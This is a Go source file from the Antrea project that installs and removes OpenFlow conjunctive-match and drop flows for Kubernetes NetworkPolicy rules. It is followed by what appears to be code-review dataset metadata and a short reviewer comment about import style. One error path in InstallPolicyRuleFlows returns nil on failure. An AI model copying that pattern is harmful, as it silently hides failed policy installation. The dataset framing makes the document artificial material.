IPNetAddress", addrType) return Unsupported } } func (a *IPNetAddress) GetMatchValue() string { addr := net.IPNet(*a) return addr.String() } func (a *IPNetAddress) GetValue() interface{} { return net.IPNet(*a) } func NewIPNetAddress(addr net.IPNet) *IPNetAddress { ia := IPNetAddress(addr) return &ia } // OFPortAddress is the Openflow port of an interface. type OFPortAddress int32 func (a *OFPortAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: // in_port is used in egress rule to match packets sent from local Pod. Service traffic is not covered by this // match, and source IP will be matched instead. return MatchSrcOFPort case types.DstAddress: return MatchDstOFPort default: klog.Errorf("Unknown AddressType %d in OFPortAddress", addrType) return Unsupported } } func (a *OFPortAddress) GetMatchValue() string { return fmt.Sprintf("%d", int32(*a)) } func (a *OFPortAddress) GetValue() interface{} { return int32(*a) } func NewOFPortAddress(addr int32) *OFPortAddress { a := OFPortAddress(addr) return &a } // ConjunctionNotFound is an error response when the specified policyRuleConjunction is not found from the local cache. type ConjunctionNotFound uint32 func (e *ConjunctionNotFound) Error() string { return fmt.Sprintf("policyRuleConjunction with ID %d not found", uint32(*e)) } func newConjunctionNotFound(conjunctionID uint32) *ConjunctionNotFound { err := ConjunctionNotFound(conjunctionID) return &err } // conjunctiveMatch generates match conditions for conjunctive match flow entry, including source or destination // IP address, ofport number of OVS interface, or Service port. When conjunctiveMatch is used to match IP // address or ofport number, matchProtocol is "ip". When conjunctiveMatch is used to match Service // port, matchProtocol is Service protocol. If Service protocol is not set, "tcp" is used by default. type conjunctiveMatch struct { tableID binding.TableIDType matchKey int matchValue interface{} } func (m *conjunctiveMatch) generateGlobalMapKey() string { var valueStr string matchType := m.matchKey switch v := m.matchValue.(type) { case net.IP: // Use the unique format "x.x.x.x/xx" for IP address and IP net, to avoid generating two different global map // keys for IP and IP/32. Use MatchDstIPNet/MatchSrcIPNet as match type to generate global cache key for both IP // and IPNet. This is because OVS treats IP and IP/32 as the same condition, if Antrea has two different // conjunctive match flow contexts, only one flow entry is installed on OVS, and the conjunctive actions in the // first context wil be overwritten by those in the second one. valueStr = fmt.Sprintf("%s/32", v.String()) switch m.matchKey { case MatchDstIP: matchType = MatchDstIPNet case MatchSrcIP: matchType = MatchSrcIPNet } case net.IPNet: valueStr = v.String() default: // The default cases include the matchValue is a Service port or an ofport Number. valueStr = fmt.Sprintf("%s", m.matchValue) } return fmt.Sprintf("table:%d,type:%d,value:%s", m.tableID, matchType, valueStr) } // changeType is generally used to describe the change type of a conjMatchFlowContext. It is also used in "flowChange" // to describe the expected OpenFlow operation which needs to be applied on the OVS bridge, and used in "actionChange" // to describe the policyRuleConjunction is expected to be added to or removed from conjMatchFlowContext's actions. // The value of changeType could be creation, modification, and deletion. type changeType int const ( insertion changeType = iota modification deletion ) // flowChange stores the expected OpenFlow entry and flow operation type which need to be applied on the OVS bridge. // The "flow" in flowChange should be nil if there is no change on the OpenFlow entry. A possible case is that a // DENY-ALL rule is required by a policyRuleConjunction, the flowChange will update the in-memory cache, but will not // change on OVS. type flowChange struct { flow binding.Flow changeType changeType } // actionChange stores the changed action of the conjunctive match flow, and the change type. // The "action" in actionChange is not nil. type actionChange struct { action *conjunctiveAction changeType changeType } // conjunctiveAction generates the policyRuleConjunction action in Openflow entry. The flow action is like // policyRuleConjunction(conjID,clauseID/nClause) when it has been realized on the switch. type conjunctiveAction struct { conjID uint32 clauseID uint8 nClause uint8 } // conjMatchFlowContext generates conjunctive match flow entries for conjunctions share the same match conditions. // One conjMatchFlowContext is responsible for one specific conjunctive match flow entry. As the match condition // of the flow entry can be shared by different conjunctions, the realized Openflow entry might have multiple // conjunctive actions. If the dropTable is not nil, conjMatchFlowContext also installs a drop flow in the dropTable. type conjMatchFlowContext struct { // conjunctiveMatch describes the match condition of conjunctive match flow entry. *conjunctiveMatch // actions is a map from policyRuleConjunction ID to conjunctiveAction. It records all the conjunctive actions in // the conjunctive match flow. When the number of actions is reduced to 0, the conjMatchFlowContext.flow is // uninstalled from the switch. actions map[uint32]*conjunctiveAction // denyAllRules is a set to cache the "DENY-ALL" rules that is applied to the matching address in this context. denyAllRules map[uint32]bool client *client // flow is the conjunctive match flow built from this context. flow needs to be updated if actions are changed. flow binding.Flow // dropflow is the default drop flow built from this context to drop packets in the AppliedToGroup but not pass the // NetworkPolicy rule. dropFlow is installed on the switch as long as either actions or denyAllRules is not // empty, and uninstalled when both two are empty. When the dropFlow is uninstalled from the switch, the // conjMatchFlowContext is removed from the cache. dropFlow binding.Flow } // createOrUpdateConjunctiveMatchFlow creates or updates the conjunctive match flow with the latest actions. It returns // the flowChange including the changed OpenFlow entry and the expected operation which need to be applied on the OVS bridge. func (ctx *conjMatchFlowContext) createOrUpdateConjunctiveMatchFlow(actions []*conjunctiveAction) *flowChange { // Check if flow is already installed. If not, create a new flow. if ctx.flow == nil { // Check the number of valid conjunctiveActions, and return nil immediately if it is 0. It happens when the match // condition is used only for matching AppliedToGroup, but no From or To is defined in the NetworkPolicy rule. if len(actions) == 0 { return nil } // Create the conjunctive match flow entry. The actions here should not be empty for either add or update case. // The expected operation for a new Openflow entry should be "insertion". flow := ctx.client.conjunctiveMatchFlow(ctx.tableID, ctx.matchKey, ctx.matchValue, actions...) return &flowChange{ flow: flow, changeType: insertion, } } // Modify the existing Openflow entry and reset the actions. flowBuilder := ctx.flow.CopyToBuilder() for _, act := range actions { flowBuilder.Action().Conjunction(act.conjID, act.clauseID, act.nClause) } // The expected operation for an existing Openflow entry should be "modification". return &flowChange{ flow: flowBuilder.Done(), changeType: modification, } } // deleteAction deletes the specified policyRuleConjunction from conjunctiveMatchFlow's actions, and then returns the // flowChange. func (ctx *conjMatchFlowContext) deleteAction(conjID uint32) *flowChange { // If the specified conjunctive action is the last one, delete the conjunctive match flow entry from the OVS bridge. // No need to check if the conjunction ID of the only conjunctive action is the specified ID or not, as it // has been checked in the caller. if len(ctx.actions) == 1 && ctx.flow != nil { return &flowChange{ flow: ctx.flow, changeType: deletion, } } else { // Modify the Openflow entry and reset the other conjunctive actions. var actions []*conjunctiveAction for _, act := range ctx.actions { if act.conjID != conjID { actions = append(actions, act) } } return ctx.createOrUpdateConjunctiveMatchFlow(actions) } } // addAction adds the specified policyRuleConjunction into conjunctiveMatchFlow's actions, and then returns the flowChange. func (ctx *conjMatchFlowContext) addAction(action *conjunctiveAction) *flowChange { // Check if the conjunction exists in conjMatchFlowContext actions or not. If yes, return nil immediately. _, found := ctx.actions[action.conjID] if found { return nil } // Append current conjunctive action to the existing actions, and then calculate the conjunctive match flow changes. actions := []*conjunctiveAction{action} for _, act := range ctx.actions { actions = append(actions, act) } return ctx.createOrUpdateConjunctiveMatchFlow(actions) } func (ctx *conjMatchFlowContext) addDenyAllRule(ruleID uint32) { if ctx.denyAllRules == nil { ctx.denyAllRules = make(map[uint32]bool) } ctx.denyAllRules[ruleID] = true } func (ctx *conjMatchFlowContext) delDenyAllRule(ruleID uint32) { // Delete the DENY-ALL rule if it is in context denyAllRules. _, found := ctx.denyAllRules[ruleID] if found { delete(ctx.denyAllRules, ruleID) } } // conjMatchFlowContextChange describes the changes of a conjMatchFlowContext. It is generated when a policyRuleConjunction // is added, deleted, or the addresses in an existing policyRuleConjunction are changed. The changes are calculated first, // and then applied on the OVS bridge using a single Bundle, and lastly the local cache is updated. The local cahce // is updated only if conjMatchFlowContextChange is applied on the OVS bridge successfully. type conjMatchFlowContextChange struct { // context is the changed conjMatchFlowContext, which needs to be updated after the OpenFlow entries are applied to // the OVS bridge. context is not nil. context *conjMatchFlowContext // ctxChangeType is the changed type of the conjMatchFlowContext. The possible values are "creation", "modification" // and "deletion". Add the context into the globalConjMatchFlowCache if the ctxChangeType is "insertion", and remove // from the globalConjMatchFlowCache if it is "deletion". ctxChangeType changeType // matchFlow is the changed conjunctive match flow which needs to be realized on the OVS bridge. It is used to update // conjMatchFlowContext.flow. matchFlow is set if the conjunctive match flow needs to be updated on the OVS bridge, or // a DENY-ALL rule change is required by the policyRuleConjunction. matchFlow is nil if the policyRuleConjunction // is already added/removed in the conjMatchFlowContext's actions or denyAllRules. matchFlow *flowChange // dropFlow is the changed drop flow which needs to be realized on the OVS bridge. It is used to update // conjMatchFlowContext.dropFlow. dropFlow is set when the default drop flow needs to be added or removed on the OVS // bridge, and it is nil in other cases. dropFlow *flowChange // clause is the policyRuleConjunction's clause having current conjMatchFlowContextChange. It is used to update the // mapping relations between the policyRuleConjunction and the conjMatchFlowContext. Update the clause.matches after // the conjMatchFlowContextChange is realized on the OVS bridge. clause is not nil. clause *clause // actChange is the changed conjunctive action. It is used to update the conjMatchFlowContext's actions. actChange // is not nil. actChange *actionChange } // updateContextStatus changes conjMatchFlowContext's status, including, // 1) reset flow and dropFlow after the flow changes have been applied to the OVS bridge, // 2) modify the actions with the changed action, // 3) update the mapping of denyAllRules and corresponding policyRuleConjunction, // 4) add the new conjMatchFlowContext into the globalConjMatchFlowCache, or remove the deleted conjMatchFlowContext // from the globalConjMatchFlowCache. func (c *conjMatchFlowContextChange) updateContextStatus() { matcherKey := c.context.generateGlobalMapKey() // Update clause.matches with the conjMatchFlowContext, and update conjMatchFlowContext.actions with the changed // conjunctive action. changedAction := c.actChange.action switch c.actChange.changeType { case insertion: c.clause.matches[matcherKey] = c.context if changedAction != nil { c.context.actions[changedAction.conjID] = changedAction } case deletion: delete(c.clause.matches, matcherKey) if changedAction != nil { delete(c.context.actions, changedAction.conjID) } } // Update the match flow in the conjMatchFlowContext. There are two kinds of possible changes on the match flow: // 1) A conjunctive match flow change required by the policyRuleConjunction. // 2) A DENY-ALL rule required by the policyRuleConjunction. // For 1), conjMatchFlowContext.Flow should be updated with the conjMatchFlowContextChange.matchFlow.flow. // For 2), append or delete the conjunction ID from the conjMatchFlowContext's denyAllRules. if c.matchFlow != nil { switch c.matchFlow.changeType { case insertion: fallthrough case modification: if c.matchFlow.flow != nil { c.context.flow = c.matchFlow.flow } else { switch c.actChange.changeType { case insertion: c.context.addDenyAllRule(c.clause.action.conjID) case deletion: c.context.delDenyAllRule(c.clause.action.conjID) } } case deletion: if c.matchFlow.flow != nil { c.context.flow = nil } else { c.context.delDenyAllRule(c.clause.action.conjID) } } } // Update conjMatchFlowContext.dropFlow. if c.dropFlow != nil { switch c.dropFlow.changeType { case insertion: c.context.dropFlow = c.dropFlow.flow case deletion: c.context.dropFlow = nil } } // Update globalConjMatchFlowCache. Add the conjMatchFlowContext into the globalConjMatchFlowCache if the ctxChangeType // is "insertion", or delete from the globalConjMatchFlowCache if the ctxChangeType is "deletion". switch c.ctxChangeType { case insertion: c.context.client.globalConjMatchFlowCache[matcherKey] = c.context case deletion: delete(c.context.client.globalConjMatchFlowCache, matcherKey) } } // policyRuleConjunction is responsible to build Openflow entries for Pods that are in a NetworkPolicy rule's AppliedToGroup. // The Openflow entries include conjunction action flows, conjunctive match flows, and default drop flows in the dropTable. // NetworkPolicyController will make sure only one goroutine operates on a policyRuleConjunction. // 1) Conjunction action flows use policyRuleConjunction ID as match condition. policyRuleConjunction ID is the single // match condition for conjunction action flows to allow packets. If the NetworkPolicy rule has also configured excepts // in From or To, extra Openflow entries are installed to drop packets using the addresses in the excepts and // policyRuleConjunction ID as the match conditions, and these flows have a higher priority than the one only matching // policyRuleConjunction ID. // 2) Conjunctive match flows adds conjunctive actions in Openflow entry, and they are grouped by clauses. The match // condition in one clause is one of these three types: from address(for fromClause), or to address(for toClause), or // service ports(for serviceClause) configured in the NetworkPolicy rule. Each conjunctive match flow entry is // maintained by one specific conjMatchFlowContext which is stored in globalConjMatchFlowCache, and shared by clauses // if they have the same match conditions. clause adds or deletes conjunctive action to conjMatchFlowContext actions. // A clause is hit if the packet matches any conjunctive match flow that are grouped by this clause. Conjunction // action flow is hit only if all clauses in the policyRuleConjunction are hit. // 3) Default drop flows are also maintained by conjMatchFlowContext. It is used to drop packets sent from or to the // AppliedToGroup but not pass the Network Policy rule. type policyRuleConjunction struct { id uint32 fromClause *clause toClause *clause serviceClause *clause actionFlows []binding.Flow } // clause groups conjunctive match flows. Matches in a clause represent source addresses(for fromClause), or destination // addresses(for toClause) or service ports(for serviceClause) in a NetworkPolicy rule. When the new address or service // port is added into the clause, it adds a new conjMatchFlowContext into globalConjMatchFlowCache (or finds the // existing one from globalConjMatchFlowCache), and then update the key of the conjunctiveMatch into its own matches. // When address is deleted from the clause, it deletes the conjunctive action from the conjMatchFlowContext, // and then deletes the key of conjunctiveMatch from its own matches. type clause struct { action *conjunctiveAction // matches is a map from the unique string generated from the conjunctiveMatch to conjMatchFlowContext. It is used // to cache conjunctive match conditions in the same clause. matches map[string]*conjMatchFlowContext // ruleTable is where to install conjunctive match flows. ruleTable binding.Table // dropTable is where to install Openflow entries to drop the packet sent to or from the AppliedToGroup but does not // satisfy any conjunctive match conditions. It should be nil, if the clause is used for matching service port. dropTable binding.Table } func (c *clause) addConjunctiveMatchFlow(client *client, match *conjunctiveMatch) *conjMatchFlowContextChange { matcherKey := match.generateGlobalMapKey() _, found := c.matches[matcherKey] if found { klog.V(2).Infof("Conjunctive match flow with matcher %s is already added in rule: %d", matcherKey, c.action.conjID) return nil } var context *conjMatchFlowContext ctxType := modification var dropFlow *flowChange // Get conjMatchFlowContext from globalConjMatchFlowCache. If it doesn't exist, create a new one and add into the cache. context, found = client.globalConjMatchFlowCache[matcherKey] if !found { context = &conjMatchFlowContext{ conjunctiveMatch: match, actions: make(map[uint32]*conjunctiveAction), client: client, } ctxType = insertion // Generate the default drop flow if dropTable is not nil and the default drop flow is not set yet. if c.dropTable != nil && context.dropFlow == nil { dropFlow = &flowChange{ flow: context.client.defaultDropFlow(c.dropTable.GetID(), match.matchKey, match.matchValue), changeType: insertion, } } } // Calculate the change on the conjMatchFlowContext. ctxChanges := &conjMatchFlowContextChange{ context: context, ctxChangeType: ctxType, clause: c, actChange: &actionChange{ changeType: insertion, }, dropFlow: dropFlow, } if c.action.nClause > 1 { // Append the conjunction to conjunctiveFlowContext's actions, and add the changed flow into the conjMatchFlowContextChange. flowChange := context.addAction(c.action) if flowChange != nil { ctxChanges.matchFlow = flowChange ctxChanges.actChange.action = c.action } } else { // Set the flowChange type as "insertion" but do not set flowChange.Flow. In this case, the policyRuleConjunction should // be added into conjunctiveFlowContext's denyAllRules. ctxChanges.matchFlow = &flowChange{ changeType: insertion, } } return ctxChanges } func (c *clause) generateAddressConjMatch(addr types.Address, addrType types.AddressType) *conjunctiveMatch { matchKey := addr.GetMatchKey(addrType) matchValue := addr.GetValue() match := &conjunctiveMatch{ tableID: c.ruleTable.GetID(), matchKey: matchKey, matchValue: matchValue, } return match } func getServiceMatchType(protocol *coreV1.Protocol) int { switch *protocol { case coreV1.ProtocolTCP: return MatchTCPDstPort case coreV1.ProtocolUDP: return MatchUDPDstPort case coreV1.ProtocolSCTP: return MatchSCTPDstPort default: return MatchTCPDstPort } } func (c *clause) generateServicePortConjMatch(port *v1.NetworkPolicyPort) *conjunctiveMatch { matchKey := getServiceMatchType(port.Protocol) matchValue := uint16(port.Port.IntVal) match := &conjunctiveMatch{ tableID: c.ruleTable.GetID(), matchKey: matchKey, matchValue: matchValue, } return match } // addAddrFlows translates the specified addresses to conjunctiveMatchFlows, and returns the corresponding changes on the // conjunctiveMatchFlows. func (c *clause) addAddrFlows(client *client, addrType types.AddressType, addresses []types.Address) []*conjMatchFlowContextChange { var conjMatchFlowContextChanges []*conjMatchFlowContextChange // Calculate Openflow changes for the added addresses. for _, addr := range addresses { match := c.generateAddressConjMatch(addr, addrType) ctxChange := c.addConjunctiveMatchFlow(client, match) if ctxChange != nil { conjMatchFlowContextChanges = append(conjMatchFlowContextChanges, ctxChange) } } return conjMatchFlowContextChanges } // addServiceFlows translates the specified NetworkPolicyPorts to conjunctiveMatchFlow, and returns corresponding // conjMatchFlowContextChange. func (c *clause) addServiceFlows(client *client, ports []*v1.NetworkPolicyPort) []*conjMatchFlowContextChange { var conjMatchFlowContextChanges []*conjMatchFlowContextChange for _, port := range ports { match := c.generateServicePortConjMatch(port) ctxChange := c.addConjunctiveMatchFlow(client, match) conjMatchFlowContextChanges = append(conjMatchFlowContextChanges, ctxChange) } return conjMatchFlowContextChanges } // deleteConjunctiveMatchFlow deletes the specific conjunctiveAction from existing flow. func (c *clause) deleteConjunctiveMatchFlow(flowContextKey string) *conjMatchFlowContextChange { context, found := c.matches[flowContextKey] // Match is not located in clause cache. It happens if the conjMatchFlowContext is already deleted from clause local cache. if !found { return nil } ctxChange := &conjMatchFlowContextChange{ context: context, clause: c, ctxChangeType: modification, actChange: &actionChange{ changeType: deletion, }, } conjID := c.action.conjID expectedConjunctiveActions := len(context.actions) expectedDenyAllRules := len(context.denyAllRules) if c.action.nClause > 1 { // Delete the conjunctive action if it is in context actions. action, found := context.actions[conjID] if found { ctxChange.matchFlow = context.deleteAction(conjID) ctxChange.actChange.action = action expectedConjunctiveActions -= 1 } } else { // Delete the DENY-ALL rule if it is in context denyAllRules. ctxChange.matchFlow = &flowChange{ changeType: deletion, } expectedDenyAllRules -= 1 } // Uninstall default drop flow if the deleted conjunctiveAction is the last action or the rule is the last one in // the denyAllRules. if expectedConjunctiveActions == 0 && expectedDenyAllRules == 0 { if context.dropFlow != nil { ctxChange.dropFlow = &flowChange{ flow: context.dropFlow, changeType: deletion, } } // Remove the context from global cache if the match condition is not used by either DENEY-ALL or the conjunctive // match flow. ctxChange.ctxChangeType = deletion } return ctxChange } // deleteAddrFlows deletes conjunctiveMatchFlow relevant to the specified addresses from local cache, // and uninstalls Openflow entry. func (c *clause) deleteAddrFlows(addrType types.AddressType, addresses []types.Address) []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange for _, addr := range addresses { match := c.generateAddressConjMatch(addr, addrType) contextKey := match.generateGlobalMapKey() ctxChange := c.deleteConjunctiveMatchFlow(contextKey) if ctxChange != nil { ctxChanges = append(ctxChanges, ctxChange) } } return ctxChanges } // deleteAllMatches deletes all conjunctiveMatchFlow in the clause, and removes Openflow entry. deleteAllMatches // is always invoked when NetworkPolicy rule is deleted. func (c *clause) deleteAllMatches() []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange for key := range c.matches { ctxChange := c.deleteConjunctiveMatchFlow(key) if ctxChange != nil { ctxChanges = append(ctxChanges, ctxChange) } } return ctxChanges } func (c *policyRuleConjunction) getAddressClause(addrType types.AddressType) *clause { switch addrType { case types.SrcAddress: return c.fromClause case types.DstAddress: return c.toClause default: klog.Errorf("no address clause use AddressType %d", addrType) return nil } } // InstallPolicyRuleFlows installs flows for a new NetworkPolicy rule. Rule should include all fields in the // NetworkPolicy rule. Each ingress/egress policy rule installs Openflow entries on two tables, one for ruleTable and // the other for dropTable. If a packet does not pass the ruleTable, it will be dropped by the dropTable. // NetworkPolicyController will make sure only one goroutine operates on a PolicyRule and addresses in the rule. // For a normal NetworkPolicy rule, these Openflow entries are installed: 1) 1 conjunction action flow, and 0 or multiple // conjunction except flows, the number of conjunction excepts flows is decided by the addresses in rule.ExceptFrom and // rule.ExceptTo is configured; 2) multiple conjunctive match flows, the flow number depends on addresses in rule.From // and rule.To, and service ports in rule.Service; and 3) multiple default drop flows, the number is dependent on // on the addresses in rule.From for an egress rule, and addresses in rule.To for an ingress rule. // For ALLOW-ALL rule, the Openflow entries installed on the switch are similar to a normal rule. The differences include, // 1) rule.Service is nil; and 2) rule.To has only one address "0.0.0.0/0" for egress rule, and rule.From is "0.0.0.0/0" // for ingress rule. // For DENY-ALL rule, only the default drop flow is installed for the addresses in rule.From for egress rule, or // addresses in rule.To for ingress rule. No conjunctive match flow or conjunction action except flows are installed. // A DENY-ALL rule is configured with rule.ID, rule.Direction, and either rule.From(egress rule) or rule.To(ingress rule). // Other fields in the rule should be nil. // If there is an error in any clause's addAddrFlows or addServiceFlows, the conjunction action flow will never be hit. // If the default drop flow is already installed before this error, all packets will be dropped by the default drop flow, // Otherwise all packets will be allowed. func (c *client) InstallPolicyRuleFlows(ruleID uint32, rule *types.PolicyRule) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() // Check if the policyRuleConjunction is added into cache or not. If yes, return nil. conj := c.getPolicyRuleConjunction(ruleID) if conj != nil { klog.V(2).Infof("PolicyRuleConjunction %d is already added in cache", ruleID) return nil } conj = &policyRuleConjunction{ id: ruleID, } nClause, ruleTable, dropTable := conj.calculateClauses(rule, c) // Conjunction action flows are installed only if the number of clauses in the conjunction is > 1. It should be a rule // to drop all packets. If the number is 1, no conjunctive match flows or conjunction action flows are installed, // but the default drop flow is installed. if nClause > 1 { // Install action flows. var actionFlows = []binding.Flow{ c.conjunctionActionFlow(ruleID, ruleTable.GetID(), dropTable.GetNext()), } if rule.ExceptFrom != nil { for _, addr := range rule.ExceptFrom { flow := c.conjunctionExceptionFlow(ruleID, ruleTable.GetID(), dropTable.GetID(), addr.GetMatchKey(types.SrcAddress), addr.GetValue()) actionFlows = append(actionFlows, flow) } } if rule.ExceptTo != nil { for _, addr := range rule.ExceptTo { flow := c.conjunctionExceptionFlow(ruleID, ruleTable.GetID(), dropTable.GetID(), addr.GetMatchKey(types.DstAddress), addr.GetValue()) actionFlows = append(actionFlows, flow) } } if err := c.flowOperations.AddAll(actionFlows); err != nil { return nil } // Add the action flows after the Openflow entries are installed on the OVS bridge successfully. conj.actionFlows = actionFlows } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() // Calculate the conjMatchFlowContext changes. The changed Openflow entries are included in the conjMatchFlowContext change. ctxChanges := conj.calculateChangesForRuleCreation(c, rule) // Send the changed Openflow entries to the OVS bridge, and then update the conjMatchFlowContext as the expected status. if err := c.applyConjunctiveMatchFlows(ctxChanges); err != nil { return err } // Add the policyRuleConjunction into policyCache. c.policyCache.Store(ruleID, conj) return nil } // applyConjunctiveMatchFlows installs OpenFlow entries on the OVS bridge, and then updates the conjMatchFlowContext. func (c *client) applyConjunctiveMatchFlows(flowChanges []*conjMatchFlowContextChange) error { // Send the OpenFlow entries to the OVS bridge. if err := c.sendConjunctiveMatchFlows(flowChanges); err != nil { return err } // Update conjunctiveMatchContext. for _, ctxChange := range flowChanges { ctxChange.updateContextStatus() } return nil } // sendConjunctiveMatchFlows sends all the changed OpenFlow entries to the OVS bridge in a single Bundle. func (c *client) sendConjunctiveMatchFlows(changes []*conjMatchFlowContextChange) error { var addFlows, modifyFlows, deleteFlows []binding.Flow var flowChanges []*flowChange for _, flowChange := range changes { if flowChange.matchFlow != nil { flowChanges = append(flowChanges, flowChange.matchFlow) } if flowChange.dropFlow != nil { flowChanges = append(flowChanges, flowChange.dropFlow) } } // Retrieve the OpenFlow entries from the flowChanges. for _, fc := range flowChanges { switch fc.changeType { case insertion: addFlows = append(addFlows, fc.flow) case modification: modifyFlows = append(modifyFlows, fc.flow) case deletion: deleteFlows = append(deleteFlows, fc.flow) } } return c.bridge.AddFlowsInBundle(addFlows, modifyFlows, deleteFlows) } func (c *policyRuleConjunction) newClause(clauseID uint8, nClause uint8, ruleTable, dropTable binding.Table) *clause { return &clause{ ruleTable: ruleTable, dropTable: dropTable, matches: make(map[string]*conjMatchFlowContext, 0), action: &conjunctiveAction{ conjID: c.id, clauseID: clauseID, nClause: nClause, }, } } // calculateClauses configures the policyRuleConjunction's clauses according to the PolicyRule. The Openflow entries are // not installed on the OVS bridge when calculating the clauses. func (c *policyRuleConjunction) calculateClauses(rule *types.PolicyRule, clnt *client) (uint8, binding.Table, binding.Table) { var ruleTable, dropTable binding.Table var isEgressRule = false switch rule.Direction { case v1.PolicyTypeEgress: ruleTable = clnt.pipeline[egressRuleTable] dropTable = clnt.pipeline[egressDefaultTable] isEgressRule = true default: ruleTable = clnt.pipeline[ingressRuleTable] dropTable = clnt.pipeline[ingressDefaultTable] } var fromID, toID, serviceID, nClause uint8 // Calculate clause IDs and the total number of clauses. if rule.From != nil { nClause += 1 fromID = nClause } if rule.To != nil { nClause += 1 toID = nClause } if rule.Service != nil { nClause += 1 serviceID = nClause } var defaultTable binding.Table if rule.From != nil { if isEgressRule { defaultTable = dropTable } else { defaultTable = nil } c.fromClause = c.newClause(fromID, nClause, ruleTable, defaultTable) } if rule.To != nil { if !isEgressRule { defaultTable = dropTable } else { defaultTable = nil } c.toClause = c.newClause(toID, nClause, ruleTable, defaultTable) } if rule.Service != nil { c.serviceClause = c.newClause(serviceID, nClause, ruleTable, nil) } return nClause, ruleTable, dropTable } // calculateChangesForRuleCreation returns the conjMatchFlowContextChanges of the new policyRuleConjunction. It // will calculate the expected conjMatchFlowContex status, and the changed Openflow entries. func (c *policyRuleConjunction) calculateChangesForRuleCreation(clnt *client, rule *types.PolicyRule) []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange if c.fromClause != nil { ctxChanges = append(ctxChanges, c.fromClause.addAddrFlows(clnt, types.SrcAddress, rule.From)...) } if c.toClause != nil { ctxChanges = append(ctxChanges, c.toClause.addAddrFlows(clnt, types.DstAddress, rule.To)...) } if c.serviceClause != nil { ctxChanges = append(ctxChanges, c.serviceClause.addServiceFlows(clnt, rule.Service)...) } return ctxChanges } // calculateChangesForRuleDeletion returns the conjMatchFlowContextChanges of the deleted policyRuleConjunction. It // will calculate the expected conjMatchFlowContex status, and the changed Openflow entries. func (c *policyRuleConjunction) calculateChangesForRuleDeletion() []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange if c.fromClause != nil { ctxChanges = append(ctxChanges, c.fromClause.deleteAllMatches()...) } if c.toClause != nil { ctxChanges = append(ctxChanges, c.toClause.deleteAllMatches()...) } if c.serviceClause != nil { ctxChanges = append(ctxChanges, c.serviceClause.deleteAllMatches()...) } return ctxChanges } func (c *client) getPolicyRuleConjunction(ruleID uint32) *policyRuleConjunction { conj, found := c.policyCache.Load(ruleID) if !found { return nil } return conj.(*policyRuleConjunction) } // UninstallPolicyRuleFlows removes the Openflow entry relevant to the specified NetworkPolicy rule. // UninstallPolicyRuleFlows will do nothing if no Openflow entry for the rule is installed. func (c *client) UninstallPolicyRuleFlows(ruleID uint32) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) if conj == nil { klog.V(2).Infof("policyRuleConjunction with ID %d not found", ruleID) return nil } // Delete action flows from the OVS bridge. if err := c.flowOperations.DeleteAll(conj.actionFlows); err != nil { return err } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() // Get the conjMatchFlowContext changes. ctxChanges := conj.calculateChangesForRuleDeletion() // Send the changed OpenFlow entries to the OVS bridge and update the conjMatchFlowContext. if err := c.applyConjunctiveMatchFlows(ctxChanges); err != nil { return err } // Remove policyRuleConjunction from client's policyCache. c.policyCache.Delete(ruleID) return nil } func (c *client) replayPolicyFlows() { var flows []binding.Flow addActionFlows := func(conj *policyRuleConjunction) { for _, flow := range conj.actionFlows { flow.Reset() flows = append(flows, flow) } } c.policyCache.Range(func(key, value interface{}) bool { addActionFlows(value.(*policyRuleConjunction)) return true }) addMatchFlows := func(ctx *conjMatchFlowContext) { if ctx.dropFlow != nil { ctx.dropFlow.Reset() flows = append(flows, ctx.dropFlow) } if ctx.flow != nil { ctx.flow.Reset() flows = append(flows, ctx.flow) } } for _, ctx := range c.globalConjMatchFlowCache { addMatchFlows(ctx) } if err := c.flowOperations.AddAll(flows); err != nil { klog.Errorf("Error when replaying flows: %v", err) } } // AddPolicyRuleAddress adds one or multiple addresses to the specified NetworkPolicy rule. If addrType is srcAddress, the // addresses are added to PolicyRule.From, else to PolicyRule.To. func (c *client) AddPolicyRuleAddress(ruleID uint32, addrType types.AddressType, addresses []types.Address) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) // If policyRuleConjunction doesn't exist in client's policyCache return not found error. It should not happen, since // NetworkPolicyController will guarantee the policyRuleConjunction is created before this method is called. The check // here is for safety. if conj == nil { return newConjunctionNotFound(ruleID) } var clause = conj.getAddressClause(addrType) // Check if the clause is nil or not. The clause is nil if the addrType is an unsupported type. if clause == nil { return fmt.Errorf("no clause is using addrType %d", addrType) } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() flowChanges := clause.addAddrFlows(c, addrType, addresses) return c.applyConjunctiveMatchFlows(flowChanges) } // DeletePolicyRuleAddress removes addresses from the specified NetworkPolicy rule. If addrType is srcAddress, the addresses // are removed from PolicyRule.From, else from PolicyRule.To. func (c *client) DeletePolicyRuleAddress(ruleID uint32, addrType types.AddressType, addresses []types.Address) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) // If policyRuleConjunction doesn't exist in client's policyCache return not found error. It should not happen, since // NetworkPolicyController will guarantee the policyRuleConjunction is created before this method is called. The check // here is for safety. if conj == nil { return newConjunctionNotFound(ruleID) } var clause = conj.getAddressClause(addrType) // Check if the clause is nil or not. The clause is nil if the addrType is an unsupported type. if clause == nil { return fmt.Errorf("no clause is using addrType %d", addrType) } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() // Remove policyRuleConjunction to actions of conjunctive match using specific address. changes := clause.deleteAddrFlows(addrType, addresses) // Update the Openflow entries on the OVS bridge, and update local cache. return c.applyConjunctiveMatchFlows(changes) }
1
13,153
Please follow the import style, move it to its similar group
antrea-io-antrea
go
